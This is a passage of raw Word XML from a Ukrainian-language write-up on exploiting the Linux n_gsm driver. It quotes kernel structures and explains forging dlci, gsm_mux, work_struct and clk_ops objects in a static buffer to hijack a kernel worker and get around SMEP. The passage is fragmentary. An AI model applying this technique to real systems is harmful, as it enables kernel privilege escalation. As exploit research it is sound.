              <w:t xml:space="preserve">entry-&gt;next = LIST_POISON2;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6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Код функції встановлює вказівник списку на NULL та POISON і це є проблемою. Як ви зрозуміли для того щоб задати функції set_rate та recal_rate треба встановити адресу фейкової структури clk_ops. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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ab/>
              <w:tab/>
              <w:t xml:space="preserve">*name;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_ops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ab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ops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Вона у нас другий член структури після name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr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Тепер розглянемо на структуру time_list яка передається в функцію таймера. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">timer_list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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/*</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * All fields that change during normal runtime grouped to the</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * same cacheline</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> */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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_node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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">entry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ab/>
              <w:tab/>
              <w:t xml:space="preserve">expires;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ab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">(*function)(struct timer_list *);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">u32</w:t>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">flags;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#ifdef CONFIG_LOCKDEP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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">lockdep_map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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">lockdep_map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#endif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br w:type="textWrapping"/>
              <w:t xml:space="preserve">};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F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структурі перший член якої являється список в якому вказівники затираються як я вже і говорив раніше. Тому це не уможливлює використання варіанту з таймером так як член ops буде не валідним. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:widowControl w:val="0"/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Переходимо до варіанту з wake_up. Унеможливлює його використання те що функцію </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gsm_dlci_negotiate неможливо задати так щоб вона повернула -1 і тим самим визвати gsm_dlci_close()-&gt;wake_up(). Так як для того щоб gsm_dlci_negotiate повернула -1 треба задати не вірні значення в члені структури gsm_dlci-&gt;ftype. Але проблема в тому що воно перезаписуються нашими валідними даними з конфігу після wait_event_interruptible в gsm_dlci_config.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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20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19171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(need_restart) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_begin_close(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">wait_event_interruptible(gsm-&gt;event, dlci-&gt;state == DLCI_CLOSED);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(signal_pending(current))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-EINTR;</w:t>
              <w:br w:type="textWrapping"/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(dc-&gt;i ==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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;ftype = UIH;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(dc-&gt;i ==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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;ftype = UI;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Тепер перейду до пояснення як працює варіант з kernel_worker.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Спочатку треба потрапити до gsm_command. Для цього ми просто заповнюємо адрес фейкового dlci об’єкта на ноль (dlci-&gt;addr = 0). Тепер переходимо до функції gsm_command-&gt;gsm_send. А коротко про об'єкт gsm_mux який передається до gsm_send. Використовуємо статичний буфер с розміром PACTH_MAX який приймає дані з userspace що дозволяє дізнатись його адресу тим самим ми обходимо SMEP. Та передаємо його адресу до члену фейкової структури dlci-&gt;gsm.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1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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_send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(struct gsm_mux *gsm,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 addr,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 cr,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 control)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_msg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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msg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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">u8 *dp;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ocr;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flags;</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">msg = gsm_data_alloc(gsm, addr,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, control);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(!msg)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-ENOMEM;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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* toggle C/R coding if not initiator */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br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">ocr = cr ^ (gsm-&gt;initiator ?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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">msg-&gt;data -=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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">dp = msg-&gt;data;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">*dp++ = (addr &lt;&lt;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) | (ocr &lt;&lt;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) | EA;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">*dp++ = control;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(gsm-&gt;encoding == GSM_BASIC_OPT)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">*dp++ = EA; </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Length of data = 0 */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br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">*dp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0xFF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- gsm_fcs_add_block(INIT_FCS, msg-&gt;data, dp - msg-&gt;data);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">msg-&gt;len = (dp - msg-&gt;data) +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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_print_packet(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4"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"Q-&gt;"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, addr, cr, control,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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">spin_lock_irqsave(&amp;gsm-&gt;tx_lock, flags);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">list_add_tail(&amp;msg-&gt;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list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, &amp;gsm-&gt;tx_ctrl_list);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">gsm-&gt;tx_bytes += msg-&gt;len;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">spin_unlock_irqrestore(&amp;gsm-&gt;tx_lock, flags);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">gsmld_write_trigger(gsm);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Перший крок це підробити список gsm-&gt;tx_ctrl_list бо якщо він буде не валідним, то при виконанні</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr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list_add_tail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(&amp;msg-&gt;list, &amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gsm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tx_ctrl_list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) система  впаде.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Далі ми переходимо до функціїї gsmld_write_trigger();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2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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsmld_write_trigger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(struct gsm_mux *gsm)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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(!gsm || !gsm-&gt;dlci[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] || gsm-&gt;dlci[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]-&gt;dead)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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">schedule_work(&amp;gsm-&gt;tx_work);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Першим ділом треба підробити об'єкт dlci разом тим вказавши що dlci-&gt;dead = false. Це робимо в нашому статичному буфері й просто вказуємо gsm наш статичний dlci об'єкт. Щоб задовольнити умови при якій ми попадаємо в функцію schedule_work().  Далі  підроблюємо структуру work_struct, вказавши функцію clk_change_rate. Але як вказується аргумент worker fun? Чи зможемо вказати туди адрес нашої корисного навантаження? При виконанні work_struct зі списку workqueue виконується функція </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">process_one_work</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(). В функціїї виконується видалення з списку workqueue за допомогою </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">list_del_init</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">work</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;entry).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4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3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19171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inline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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">list_del_init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(struct list_head *entry)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">{</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__list_del_entry(entry);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">INIT_LIST_HEAD(entry);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inline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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">INIT_LIST_HEAD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(struct list_head *list)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">{</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">WRITE_ONCE(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list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-&gt;next,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list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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">WRITE_ONCE(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list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-&gt;prev,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list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);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6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0"/>
        <w:spacing w:line="331.2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0"/>
        <w:spacing w:line="331.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Як бачимо спочатку елемент видаляється зі списку, а потім елемент ініціалізується адресом який вказує на себе. Тепер порівняємо work_struct з clk_core.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA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4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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">work_struct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atomic_long_t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data;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">list_head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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">entry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work_func_t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func;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#ifdef CONFIG_LOCKDEP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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">lockdep_map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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">lockdep_map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#endif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br w:type="textWrapping"/>
              <w:t xml:space="preserve">};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C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5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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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ab/>
              <w:tab/>
              <w:t xml:space="preserve">*name;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_ops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ab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ops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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_hw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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hw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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">module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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">owner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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">device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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dev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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">device_node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ab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">of_node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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">parent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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_parent_map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ab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">parents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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">u8</w:t>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">num_parents;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">u8</w:t>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">new_parent_index;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">rate;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">req_rate;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">new_rate;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">new_parent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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">new_child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ab/>
              <w:tab/>
              <w:t xml:space="preserve">flags;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ab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">orphan;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ab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">rpm_enabled;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">enable_count;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">prepare_count;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">protect_count;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">min_rate;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">max_rate;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ab/>
              <w:tab/>
              <w:t xml:space="preserve">accuracy;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ab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">phase;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_duty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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">duty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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_head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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">children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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_node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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">child_node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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_head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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clks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ab/>
              <w:tab/>
              <w:t xml:space="preserve">notifier_count;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#ifdef CONFIG_DEBUG_FS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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dentry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ab/>
              <w:tab/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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dentry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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_node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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">debug_node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#endif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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">kref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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ref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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">};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E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Як бачимо список entry збігатися з розташуванням члену clk_ops структури clk_core як і варіанті з таймером. Але оскільки list_del_init перезаписав entry, а то їсть clk_ops на адрес work_struct_clk_core структури з зміщенням на +8 то в плюсі. Потрібно просто встановити члени структури на які вказує зміщення структури clk_ops.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0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6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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_ops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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*prepare)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*unprepare)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*is_prepared)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*unprepare_unused)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*enable)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*disable)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*is_enabled)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*disable_unused)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*save_context)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*restore_context)(struct clk_hw *hw);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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear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(*recalc_rate)(struct clk_hw *hw,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab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 parent_rate)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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*round_rate)(struct clk_hw *hw,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rate,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab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*parent_rate);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*determine_rate)(struct clk_hw *hw,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">  struct clk_rate_request *req);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*set_parent)(struct clk_hw *hw, u8 index);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">u8</w:t>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">(*get_parent)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*set_rate)(struct clk_hw *hw,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rate,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab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parent_rate);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*set_rate_and_parent)(struct clk_hw *hw,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab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rate,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab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parent_rate, u8 index);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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear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(*recalc_accuracy)(struct clk_hw *hw,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab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 parent_accuracy)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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*get_phase)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*set_phase)(struct clk_hw *hw,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degrees);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*get_duty_cycle)(struct clk_hw *hw,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">  struct clk_duty *duty);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*set_duty_cycle)(struct clk_hw *hw,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">  struct clk_duty *duty);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*init)(struct clk_hw *hw);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ab/>
              <w:tab/>
              <w:t xml:space="preserve">(*terminate)(struct clk_hw *hw);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ab/>
              <w:tab/>
